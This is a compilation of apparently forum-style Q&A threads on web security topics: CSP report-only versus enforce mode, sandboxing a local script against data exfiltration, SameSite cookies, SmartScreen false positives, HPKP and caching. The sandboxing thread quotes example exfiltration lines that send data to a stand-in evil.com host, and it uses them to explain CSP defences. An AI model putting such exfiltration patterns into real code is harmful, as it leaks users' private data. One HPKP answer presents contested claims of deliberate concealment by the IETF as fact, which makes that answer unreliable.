I am working on a Content Security Policy to add to my pages. I am confused by the terms "enforce CSP" and "CSP report-only". What is the difference between the two, and how is each useful?
A CSP puts a number of restrictions on the sources of content and on specific actions. Since this has the potential to break a lot of functionality, there is also a report-only mode, which can be thought of as a test mode. In report-only mode you get the same browser errors about violations, but they are not enforced and are marked as report-only. For a report-only CSP to be useful you must define a report-uri to send the reports to.

Gathering reports from real users for a while will surface problems with your policy before you switch to enforce mode. You will likely also get some false positives caused by proxy rewrites, browser extensions, malware, etc.

Report-only gives no protection, and violations are only visible to users who take a look at the dev tools. A strict enforced CSP, by contrast, is essential in protecting your users from a number of web attacks such as XSS and clickjacking.
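For example (the policy and the report endpoint below are placeholders, not from the post), a typical rollout starts by shipping the candidate policy under the report-only header name:

```
Content-Security-Policy-Report-Only: default-src 'self'; report-uri https://example.com/csp-reports
```

Once the collected reports look clean, the same policy moves to the enforcing header name:

```
Content-Security-Policy: default-src 'self'; report-uri https://example.com/csp-reports
```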
The background scenario is that I want to give my users a piece of JavaScript which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent over the internet.
Initially, I thought I'd just distribute it as an .html file with an embedded <script>, and that users would simply open this .html file in their browser over the file:/// protocol, which gives some nice same-origin policy defaults.
But this won't really offer much security to my users: the JavaScript could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag, which would send a GET request to evil.com despite evil.com being a different origin, because embedding images from different origins is allowed by design.
Is there some practical way to distribute my JavaScript, and/or for the end user to run such a script, so that they can be reasonably sure it can't send their data over the internet?
(Unplugging the machine from the internet, installing a VM, or manipulating firewall settings are not practical.)
(Reasonably sure = assuming the software they use, such as the browser, follows the spec and wasn't hacked.)
Please take a look at the Content-Security-Policy topic.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your HTML with <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should stop the browser from loading images from foreign origins. Note that img-src only governs image loads; to close the other channels (fetch/XHR, frames, stylesheets, and so on) you would want a broader policy built on default-src.
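As a sketch of a stricter version (everything here is illustrative, not from the post), a self-contained page could ship with a policy that blocks all resource loads and re-enables only its own inline script and styles:

```html
<!-- Sketch: default-src 'none' blocks every load (images, fetch/XHR,
     frames, fonts, stylesheets); the two allowances below re-enable
     only inline script and inline styles for the page itself. -->
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy"
      content="default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'">
</head>
<body>
<script>
  // Analysis code runs here. An exfiltration attempt such as
  //   new Image().src = 'https://evil.com/?d=' + data;
  // is blocked, because img-src falls back to default-src 'none'.
</script>
</body>
</html>
```

One caveat: form submissions are governed by the separate form-action directive (so a thorough policy would add form-action 'none'), and plain navigation via window.location is not covered by CSP at all, so this narrows but does not fully close every exfiltration channel.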
An alternative approach could be to develop your project as a browser extension, where you can set up the content security policy quite precisely, including directives for inline scripts, string-to-code functions such as eval, frame and font origins, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ ).
As a bonus, you (and your users) get a free-of-charge code review from the security departments of the browser vendors.
Setting the browser's proxy to localhost:DUMMY_PORT in its settings looks like a safe solution for this case.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So this reduces what the user has to trust to Deno itself (and to Chocolatey, if they use choco install deno to install it).
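For illustration (the script name is a placeholder), the user would run the analysis script with no permission flags, so any network call is denied (or prompts the user) at runtime rather than silently succeeding:

```
deno run analyze.ts               # no --allow-net: fetch() from the script is refused

deno run --allow-net analyze.ts   # network works only if the user opts in explicitly
```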
Beginning with Chrome 80, third-party cookies will be blocked unless they carry the SameSite=None and Secure attributes (None being a new value for the SameSite attribute). https://blog.chromium.org/2019/10/developers-get-ready-for-new.html
The blog post above states that Firefox and Edge plan to implement these changes at an undetermined date, and there is a list of incompatible browsers here: https://www.chromium.org/updates/same-site/incompatible-clients.
What would be the best practice for handling this situation for cross-browser compatibility?
An initial thought is to use local storage instead of a cookie, but there is a concern that a similar change could happen to local storage in the future.
You hit on a good point: as browsers move toward stronger protections for user privacy, sites need to reconsider how they handle data. There's definitely a tension between the composable, embeddable nature of the web and the privacy and security concerns around that mixed content. I think this is currently coming to the foreground in the conflict over fingerprinting vectors: the signals being locked down to prevent user tracking are often the same signals sites use to detect fraud. It's the age-old problem that if you have perfect privacy for "good" reasons, then all the people doing "bad" things (like cycling through a batch of stolen credit cards) also have perfect privacy.
Anyway, ethical dilemmas aside, I would suggest finding ways to encourage users to have an intentional, first-party relationship with your site or service whenever you need to track some kind of state related to them. It feels like a generally safe assumption to code as if all storage will eventually be partitioned and as if any form of tracking must happen via informed consent. Even if that's not the direction things go, I still think you will have created a better experience.
In the short term, there are some options at https://web.dev/samesite-cookie-recipes:
Use two sets of cookies, one with the current-format attributes and one without, to catch all browsers.
Sniff the user agent to return the appropriate headers to each browser.
You can also maintain a first-party cookie, e.g. SameSite=Lax or SameSite=Strict that you use to refresh the cross-site cookies when the user visits your site in a top-level context. For example, if you provide an embeddable widget that gives personalised content, in the event there are no cookies you can display a message in the widget that links the user to the original site to sign in. That way you're explicitly communicating the value to your user of allowing them to be identified across this site boundary.
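The user-agent sniff from the recipes above can be sketched as follows. The helper names are mine, and the patterns cover only the best-known incompatible clients from the chromium.org list (Chrome 51-66, Safari on iOS 12 / macOS 10.14), so treat this as illustrative rather than exhaustive:

```javascript
// Sketch: decide whether a client understands SameSite=None.
function supportsSameSiteNone(ua) {
  // Chrome and Chromium 51-66 reject cookies carrying SameSite=None outright.
  const chrome = ua.match(/Chrom(?:e|ium)\/(\d+)/);
  if (chrome && +chrome[1] >= 51 && +chrome[1] <= 66) return false;
  // Safari on iOS 12 and macOS 10.14 treat SameSite=None as SameSite=Strict.
  if (/\(iP.+; CPU .*OS 12[_\d]*.*\) AppleWebKit\//.test(ua)) return false;
  if (/\(Macintosh;.*Mac OS X 10_14[_\d]*.*\) AppleWebKit\//.test(ua) && !/Chrom/.test(ua)) return false;
  return true;
}

// The "two sets of cookies" recipe: always set a legacy fallback cookie,
// and add the SameSite=None variant only for clients that understand it.
function sessionCookieHeaders(ua, value) {
  const headers = [`session-legacy=${value}; Secure; HttpOnly`];
  if (supportsSameSiteNone(ua)) {
    headers.push(`session=${value}; SameSite=None; Secure; HttpOnly`);
  }
  return headers;
}
```

On the server you would emit one Set-Cookie header per returned string, and accept whichever of the two cookies arrives on later requests.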
For a longer-term view, you can look at proposals like HTTP State Tokens, which outlines a single, client-controlled token with an explicit cross-site opt-in. There's also the isLoggedIn proposal, which provides a way to indicate to the browser that a specific token is used to track the user's session.
My Magento 1.9 webshop is marked as unsafe (phishing, which is not true) in Microsoft Edge; if I switch to IE and run the SmartScreen security check, it says all is safe.
Strangely, it happens only on one of my computers, so I didn't think much of it, but a customer also complained about it today.
Has anyone experienced this before and found a solution? Is there a way to check why a site is marked as unsafe by SmartScreen?
Based on my research, the information below may be helpful to you.
Q. If I am a website owner, how do I correct a warning on my legitimate site?
A. You can immediately submit a request for a correction. Windows Defender SmartScreen has a built-in, web-based feedback system in place to help customers and website owners report any potential false warnings as quickly as possible. In Windows Internet Explorer, from a red warning, click More information then Report that this site contains no threats. This will take you to a feedback page where you can indicate you are a site owner or representative. Follow the instructions and provide the information on this site to submit a site for review...
Reference:
Resolving “This website has been reported as unsafe” (Windows Defender SmartScreen)
Q.
If I am a website owner, what can I do to help minimize the chance of my website being flagged by Windows Defender SmartScreen?
A.
There are several things you can do that can help minimize the chance of your site being flagged as suspicious. Think of these as best practices or optimal website design ethics.
If you ask users for personal information, use HTTPS with a valid, unexpired server certificate issued by a trusted certification authority.
Make sure that your webpage doesn't expose any cross-site scripting (XSS) vulnerabilities. Protect your site by using anti-cross-site scripting functions such as those provided by the Microsoft Anti-Cross Site Scripting library.
Use the fully-qualified domain name rather than an IP-literal address. (This means a URL should look like "microsoft.com" and not "207.46.19.30.")
Don't encode or tunnel your URLs unnecessarily. If you don't know what this means, you probably aren't doing it.
If you post external or third-party hosted content, make sure that the content is secure and from a known and trusted source.
Reference:
Windows Defender SmartScreen Frequently Asked Questions
In the MS Edge browser there's an option to report the site as safe. After clicking it, select the "I'm a website owner" option and fill in the false-positive form.
I added an HPKP header to my site, but it is not honored by Chrome or Safari. I tested it manually by setting a proxy, and by going to chrome://net-internals/#hsts and looking for my domain, which was not found. The HPKP header seems correct, and I also checked it with an HPKP toolset, so I know it is valid.
I am thinking I might be doing something weird with my flow. I have a web app served at myapp.example.com. On login, the app redirects the user to authserver.example.com/begin to initiate an OpenID Connect Authorization Code flow. The HPKP header is returned only from authserver.example.com/begin, and I thought this might be the issue; however, I have includeSubDomains in the HPKP header, so I think it is not.
This is the HPKP header (line breaks added for readability):
public-key-pins:max-age=864000;includeSubDomains; \
pin-sha256="bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE="; \
pin-sha256="cJjqBxF88mhfexjIArmQxvZFqWQa45p40n05C6X/rNI="; \
report-uri="https://reporturl.example"
Thanks!
I added HPKP header to my site, but it is not honored by Chrome or Safari... I tested it manually by setting a proxy...
RFC 7469, Public Key Pinning Extension for HTTP, kind of sneaks that past you. The IETF published it with overrides, so an attacker can break a known-good pinset. The "override" is mentioned once in the standard by name, but the details are not provided. The IETF also failed to discuss it in a security considerations section.
More to the point, the proxy you set up engaged the override. It does not matter whether it's your own proxy, a proxy certificate installed by a mobile device OEM, or a proxy controlled by an attacker who tricked a user into installing its certificate. The web security model and the standard allow it; they embrace interception and consider it a valid use case.
Something else they did was make reporting of the broken pinset a MUST NOT or SHOULD NOT, which means the user agent is complicit in the cover-up, too. That's not discussed in a security considerations section, either. They really don't want folks to know their supposedly secure connection is being intercepted.
Your best bet to avoid it is to move outside the web security model. Don't use browser-based apps when security is a concern. Use a hybrid app and perform the pinning yourself. Your hybrid app can host a WebView control or view, but still get access to the channel to verify its parameters. Also see OWASP's Certificate and Public Key Pinning.
Also see "Comments on draft-ietf-websec-key-pinning" on the IETF mailing list. One suggestion in the comments was to change the title to "Public Key Pinning Extension for HTTP with Overrides" to highlight the feature. Not surprisingly, that's not something they wanted. They are trying to do it surreptitiously, without user knowledge.
Here's the relevant text from RFC 7469:
2.7. Interactions with Preloaded Pin Lists
UAs MAY choose to implement additional sources of pinning
information, such as through built-in lists of pinning information.
Such UAs should allow users to override such additional sources,
including disabling them from consideration.
The effective policy for a Known Pinned Host that has both built-in
Pins and Pins from previously observed PKP header response fields is
implementation-defined.
Locally installed CAs (like those used for the proxies you say you are running) override any HPKP checks.
This is necessary so as not to completely break the internet, given how prevalent they are: anti-virus software and proxies used in large corporations basically MITM HTTPS traffic through a locally issued certificate, as otherwise they could not read the traffic.
Some argue that locally installing a CA requires access to your machine, and at that point it's game over anyway. But to me this still massively reduces the protection of HPKP, and that, coupled with the high risks of using HPKP, means I am really not a fan of it.
What is the complete set of factors that affect image caching in web browsers? How much control does a web developer have over this, and how much is down to browser settings? Are there different considerations for other types of assets (e.g. scripts, audio)?
Thanks
The complete set of factors:

- HTTP headers which affect caching
- the user agent's (browser's) built-in caching behavior
  - may be modified through user settings, depending on the UA
  - including private-browsing modes that may use, and then clear, a separate cache per session
- the user's actions, such as manually clearing the cache
Web developers have very little control, but this is fine. Remember that caching is done for the benefit of the end user, usually to reduce page load time, and it's generally infeasible for you to know all the considerations specific to every user.
The bits you can control are the expiration time and the no-cache behavior. These respectively specify when the resource should be refetched because it is expected to have changed, and that it should not be reused without revalidation for other reasons.
Browsers may treat images differently than other resources (mainly differing in default expiration time when unspecified), but you can send HTTP headers for any resource.
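As a sketch of that control (the values are illustrative), the relevant response headers look like:

```
Cache-Control: max-age=86400    (serve from cache without revalidating for one day)
Cache-Control: no-cache         (store, but revalidate with the server before each reuse)
Cache-Control: no-store         (do not cache at all, e.g. for sensitive responses)
```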
From the client side, check whether the browser sends the If-Modified-Since header to the server. If it does and the file has not changed, IIS will respond with 304 Not Modified, and the client will use its locally cached copy of the file.
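For illustration (the path and date are made up), the conditional exchange looks like:

```
GET /images/logo.png HTTP/1.1
Host: www.example.com
If-Modified-Since: Tue, 01 Oct 2019 10:00:00 GMT

HTTP/1.1 304 Not Modified
```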
The client's settings control this. In IE, Tools -> Internet Options -> Browsing History -> Settings -> "Automatically" will ensure this takes place. Other browsers keep this setting in different places.
For scripts/audio, you can place them in a dedicated content folder and set content expiration on the server, so that the server sends the appropriate caching headers to the client when the file is requested. This isn't a developer setting, though.
The developer setting typically applies to dynamic files, and it varies by language and framework (in ASP.NET, the OutputCache directive produces the corresponding cache headers).